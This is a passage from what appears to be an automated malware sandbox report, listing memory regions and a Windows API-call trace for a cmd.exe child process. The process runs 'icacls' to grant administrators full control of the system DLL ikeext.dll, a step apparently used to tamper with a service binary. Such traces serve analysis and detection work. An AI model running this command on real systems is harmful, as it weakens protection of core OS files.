AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1132 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1133 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1134 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1135 start_va = 0x160000 end_va = 0x169fff entry_point = 0x160000 region_type = mapped_file name = "icacls.exe" filename = "\\Windows\\System32\\icacls.exe" (normalized: "c:\\windows\\system32\\icacls.exe") Region: id = 1136 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1137 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1138 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1139 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1140 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1141 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1142 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1143 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1144 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1145 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1146 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1147 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1148 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1149 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1150 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1151 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1152 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1153 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1154 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1155 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1156 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1157 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 47 os_tid = 0xbd8 Thread: id = 48 os_tid = 0xbdc Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef77a0" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb74" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1158 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1159 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1160 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1161 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1162 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1163 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1164 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1165 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1166 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1167 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1168 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1169 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1170 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1171 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1172 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1173 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1174 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1175 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1176 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1177 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1178 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1179 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1180 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1181 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1182 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1183 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1184 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1185 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1186 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1187 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1188 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1189 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1190 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1191 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 1192 start_va = 0x13f0000 end_va = 0x16befff entry_point = 0x13f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 49 os_tid = 0xbe4 [0048.304] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f924 | out: lpSystemTimeAsFileTime=0x30f924*(dwLowDateTime=0x4e10cf80, dwHighDateTime=0x1d34280)) [0048.304] GetCurrentProcessId () returned 0xbe0 [0048.304] GetCurrentThreadId () returned 0xbe4 [0048.304] GetTickCount () returned 0x13df9 [0048.304] QueryPerformanceCounter (in: lpPerformanceCount=0x30f91c | out: lpPerformanceCount=0x30f91c*=317267978) returned 1 [0048.306] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0048.306] __set_app_type (_Type=0x1) [0048.306] __p__fmode () returned 0x768231f4 [0048.306] __p__commode () returned 0x768231fc [0048.306] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0048.306] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0048.306] GetCurrentThreadId () returned 0xbe4 [0048.306] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbe4) returned 0x38 [0048.306] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.306] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0048.306] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.307] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.307] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f8b4 | out: phkResult=0x30f8b4*=0x0) returned 0x2 [0048.307] VirtualQuery (in: lpAddress=0x30f8eb, lpBuffer=0x30f884, dwLength=0x1c | out: lpBuffer=0x30f884*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.307] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f884, dwLength=0x1c | out: lpBuffer=0x30f884*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0048.307] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f884, dwLength=0x1c | out: lpBuffer=0x30f884*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0048.307] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f884, dwLength=0x1c | out: lpBuffer=0x30f884*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.307] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f884, dwLength=0x1c | out: lpBuffer=0x30f884*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0048.307] GetConsoleOutputCP () returned 0x1b5 [0048.307] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.307] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0048.307] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.307] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0048.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.308] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0048.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0048.308] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.308] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0048.308] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.308] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0048.308] GetEnvironmentStringsW () returned 0x410150* [0048.309] FreeEnvironmentStringsW (penv=0x410150) returned 1 [0048.309] GetEnvironmentStringsW () returned 0x410150* [0048.309] FreeEnvironmentStringsW (penv=0x410150) returned 1 [0048.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e824 | out: phkResult=0x30e824*=0x40) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x0, lpData=0x30e830*=0x0, lpcbData=0x30e828*=0x1000) returned 0x2 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x1, lpcbData=0x30e828*=0x4) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x0, lpData=0x30e830*=0x1, lpcbData=0x30e828*=0x1000) returned 0x2 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x0, lpcbData=0x30e828*=0x4) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x40, lpcbData=0x30e828*=0x4) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x40, lpcbData=0x30e828*=0x4) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x0, lpData=0x30e830*=0x40, lpcbData=0x30e828*=0x1000) returned 0x2 [0048.309] RegCloseKey (hKey=0x40) returned 0x0 [0048.309] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e824 | out: phkResult=0x30e824*=0x40) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x0, lpData=0x30e830*=0x40, lpcbData=0x30e828*=0x1000) returned 0x2 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x1, lpcbData=0x30e828*=0x4) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x0, lpData=0x30e830*=0x1, lpcbData=0x30e828*=0x1000) returned 0x2 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x0, lpcbData=0x30e828*=0x4) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x9, lpcbData=0x30e828*=0x4) returned 0x0 [0048.309] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x4, lpData=0x30e830*=0x9, lpcbData=0x30e828*=0x4) returned 0x0 [0048.310] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e82c, lpData=0x30e830, lpcbData=0x30e828*=0x1000 | out: lpType=0x30e82c*=0x0, lpData=0x30e830*=0x9, lpcbData=0x30e828*=0x1000) returned 0x2 [0048.310] RegCloseKey (hKey=0x40) returned 0x0 [0048.310] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa0f [0048.310] srand (_Seed=0x59ddfa0f) [0048.310] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F\"" [0048.310] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F\"" [0048.310] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.310] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4119a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0048.310] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.310] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.310] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.310] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0048.310] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0048.310] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0048.310] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0048.311] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0048.311] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0048.311] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0048.311] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0048.311] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0048.311] GetEnvironmentStringsW () returned 0x4123e0* [0048.311] FreeEnvironmentStringsW (penv=0x4123e0) returned 1 [0048.311] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.311] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0048.311] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0048.311] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0048.311] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0048.311] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0048.311] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0048.311] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0048.311] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0048.311] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0048.311] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f5f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x30f5f0, lpFilePart=0x30f5ec | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x30f5ec*="system32") returned 0x13 [0048.311] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.312] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x30f36c | out: lpFindFileData=0x30f36c) returned 0x410980 [0048.312] FindClose (in: hFindFile=0x410980 | out: hFindFile=0x410980) returned 1 [0048.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x30f36c | out: lpFindFileData=0x30f36c) returned 0x410980 [0048.312] FindClose (in: hFindFile=0x410980 | out: hFindFile=0x410980) returned 1 [0048.312] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0048.312] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0048.312] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0048.312] GetEnvironmentStringsW () returned 0x410150* [0048.313] FreeEnvironmentStringsW (penv=0x410150) returned 1 [0048.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.315] _wcsnicmp (_String1="icac", _String2="cmd ", _MaxCount=0x4) returned 6 [0048.315] SetErrorMode (uMode=0x0) returned 0x8001 [0048.315] SetErrorMode (uMode=0x1) returned 0x0 [0048.315] GetFullPathNameW (in: lpFileName="icacls C:\\Windows\\system32\\ikeext.dll \\.", nBufferLength=0x208, lpBuffer=0x400890, lpFilePart=0x30f568 | out: lpBuffer="C:\\Windows\\system32\\icacls C:\\Windows\\system32\\ikeext.dll", lpFilePart=0x30f568*="ikeext.dll") returned 0x39 [0048.315] SetErrorMode (uMode=0x8001) returned 0x1 [0048.315] NeedCurrentDirectoryForExePathW (ExeName="icacls C:\\Windows\\system32\\ikeext.dll \\.") returned 1 [0048.315] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.318] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.318] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls C:\\Windows\\system32\\ikeext.dll\\grant administrators:F.*", fInfoLevelId=0x1, lpFindFileData=0x30f2e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2e4) returned 0xffffffff [0048.318] GetLastError () returned 0x7b [0048.318] GetConsoleOutputCP () returned 0x1b5 [0048.318] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.318] GetUserDefaultLCID () returned 0x409 [0048.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0048.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f730, cchData=128 | out: lpLCData="0") returned 2 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f730, cchData=128 | out: lpLCData="0") returned 2 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f730, cchData=128 | out: lpLCData="1") returned 2 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0048.319] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0048.319] 